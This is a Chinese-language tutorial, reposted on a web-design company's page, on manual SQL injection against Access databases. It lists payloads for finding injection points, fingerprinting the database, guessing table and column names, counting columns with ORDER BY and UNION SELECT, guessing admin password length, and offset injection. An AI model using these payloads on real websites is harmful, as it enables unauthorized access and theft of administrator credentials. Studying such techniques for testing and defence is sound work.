access数据库的手工注入-成都创新互联网站建设

关于创新互联

多方位宣传企业产品与服务 突出企业形象

公司简介 公司的服务 荣誉资质 新闻动态 联系我们

access数据库的手工注入

access数据库

目前创新互联已为1000+的企业提供了网站建设、域名、网络空间、网站托管、服务器租用、企业网站设计、孟村网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

优势:提高速度和减少代码量

缺点:数据过大性能下降,安全性低

后缀名:.mdb

打开工具:辅臣数据库浏览器,破障浏览器

access注入

判断注入点:‘ ,and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号,报错有注入点

判断数据库类型:and exists(select * from msysobjects)>0  存在说明是access数据库 ,   and exists(select * from sysobjects)>0 存在说明是sql server数据库

判断数据库中的表:and exists(select * from admin) 返回成功说明存在

access的数据库中的表:admin,msysobjects,user,username,

判断数据库中表内的字段名:and exists(select username from admin) 返回成功说明存在

判断字段长度:order by N

报错:and 1=2 union select 1,2,....,N from admin(联合查询)

判断账户密码长度:and (select len(admin) from admin)=5 如果返回正常说明管理账户的长度为5

and (select len(password) from admin)=5 猜解管理密码长度是5

access数据库的手工注入

偏移注入 

主要用来解决表名猜到,列名猜不到的情况

and 1=2 union select 1,2,....,N from admin(联合查询),用*从最后一个字段向前逐个代替,直到显示正常为止,*代表所有数据表内的字段

access数据库的手工注入

access数据库的手工注入


文章标题:access数据库的手工注入
分享URL:http://kswsj.cn/article/jicigs.html

其他资讯